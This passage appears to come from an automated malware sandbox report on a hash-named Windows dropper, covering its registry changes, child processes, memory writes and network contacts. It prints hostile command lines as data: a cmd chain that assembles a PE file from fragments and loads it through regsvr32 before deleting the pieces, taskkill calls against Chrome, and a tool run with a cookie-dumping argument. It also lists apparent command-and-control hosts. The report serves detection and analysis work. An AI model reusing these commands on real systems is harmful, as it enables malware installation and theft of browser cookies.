96e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\piz.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\asj.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\asj.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Temp\www57F2.tmp\:favicon:$DATA C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
File created C:\Users\Admin\AppData\Local\Temp\Shakmp.url:favicon C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
File created C:\Users\Admin\AppData\Local\Temp\wwwE4D5.tmp\:favicon:$DATA C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
File created C:\Users\Admin\AppData\Local\Temp\RarSFX2\ins.url:favicon C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
File created C:\Users\Admin\AppData\Local\Temp\www1B23.tmp\:favicon:$DATA C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
File created C:\Users\Admin\AppData\Local\Temp\RarSFX1\jul.url:favicon C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2092 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 2092 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 2092 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 2092 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 2092 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 2092 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 2092 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 2092 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe
PID 2092 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe
PID 2092 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe
PID 2092 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe
PID 2092 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\asj.exe
PID 2092 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\asj.exe
PID 2092 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\asj.exe
PID 2092 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\asj.exe
PID 2092 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\secd.exe
PID 2092 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\secd.exe
PID 2092 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\secd.exe
PID 2092 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\secd.exe
PID 3056 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 3056 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 3056 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 3056 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 3056 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 3056 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 3056 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 2092 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\cld.exe
PID 2092 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\cld.exe
PID 2092 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\cld.exe
PID 2092 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\cld.exe
PID 2960 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\secd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe
PID 2960 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\secd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe
PID 2960 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\secd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe
PID 2960 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\secd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe
PID 2092 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe
PID 2092 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe
PID 2092 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe
PID 2092 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe
PID 2092 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\piz.exe
PID 2092 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\piz.exe
PID 2092 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\piz.exe
PID 2092 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\piz.exe
PID 2716 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe
PID 2716 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe
PID 2716 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe
PID 2716 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe
PID 2716 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe
PID 2716 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe
PID 2716 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe
PID 2932 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\cld.exe C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe
PID 2932 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\cld.exe C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe
PID 2932 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\cld.exe C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe
PID 2932 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\cld.exe C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe
PID 2092 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe
PID 2092 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe
PID 2092 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe
PID 2092 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe
PID 2092 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe
PID 2092 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe
PID 2092 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe
PID 1884 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe C:\Windows\SysWOW64\cmd.exe
PID 1884 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe C:\Windows\SysWOW64\cmd.exe
PID 1884 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe C:\Windows\SysWOW64\cmd.exe
PID 1884 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe

"C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe"

C:\Users\Admin\AppData\Local\Temp\file_clu.exe

"C:\Users\Admin\AppData\Local\Temp\file_clu.exe"

C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe

"C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe"

C:\Users\Admin\AppData\Local\Temp\asj.exe

"C:\Users\Admin\AppData\Local\Temp\asj.exe"

C:\Users\Admin\AppData\Local\Temp\secd.exe

"C:\Users\Admin\AppData\Local\Temp\secd.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /Y "C:\Users\Admin\AppData\Local\Temp\file_clu.exe" ..\RwJ2xhfygvdE.exe&& stArt ..\RwJ2xhfygvdE.exe /Pxcee7dXhg1LR & If "" == "" for %H In ( "C:\Users\Admin\AppData\Local\Temp\file_clu.exe" ) do taskkill /iM "%~nxH" /F

C:\Users\Admin\AppData\Local\Temp\cld.exe

"C:\Users\Admin\AppData\Local\Temp\cld.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe"

C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe

"C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe"

C:\Users\Admin\AppData\Local\Temp\piz.exe

"C:\Users\Admin\AppData\Local\Temp\piz.exe"

C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe

..\RwJ2xhfygvdE.exe /Pxcee7dXhg1LR

C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe"

C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe

"C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /Y "C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe" ..\RwJ2xhfygvdE.exe&& stArt ..\RwJ2xhfygvdE.exe /Pxcee7dXhg1LR & If "/Pxcee7dXhg1LR " == "" for %H In ( "C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe" ) do taskkill /iM "%~nxH" /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /iM "file_clu.exe" /F

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /C eCho | SEt /p = "MZ" > wUAR.VX & cOPy /Y /B wUAr.vX +~TED1E2.CFH + G62c.4+ H7__2BUr.8I + 3O0QMRE.5K + C1SM1U.Qa0 +s77950_.98+ MzfNNq.QI + W8Te.Qm7 + ALXC.kJM + 18CHh.JB + gWp3M.DH + 2CmT.ZW ..\_MORBZV.~5 &sTaRT regsvr32 -s ..\_MOrBZV.~5 -U& DEl /q *

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCho "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>wUAR.VX"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 -s ..\_MOrBZV.~5 -U

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1760 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1760 CREDAT:4076562 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe

"{path}"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1760 CREDAT:3814416 /prefetch:2

Network

Country Destination Domain Proto
HK 101.36.107.74:80 tcp
US 8.8.8.8:53 www.wsfsd33sdfer.com udp
US 8.8.8.8:53 is.gd udp
US 104.25.234.53:443 is.gd tcp
US 8.8.8.8:53 c.pki.goog udp
GB 172.217.16.227:80 c.pki.goog tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 www.cncode.pw udp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.23:443 bitbucket.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 34.211.97.45:80 www.cncode.pw tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 www.facebook.com udp
GB 163.70.147.35:443 www.facebook.com tcp
US 8.8.8.8:53 www.fddnice.pw udp
US 54.244.188.177:80 www.fddnice.pw tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 uehge4g6gh.2ihsfa.com udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
NL 185.241.54.156:35200 tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.126.244.207:8080 tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
NL 185.241.54.156:35200 tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.126.244.207:8080 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
NL 185.241.54.156:35200 tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
NL 185.241.54.156:35200 tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
NL 185.241.54.156:35200 tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
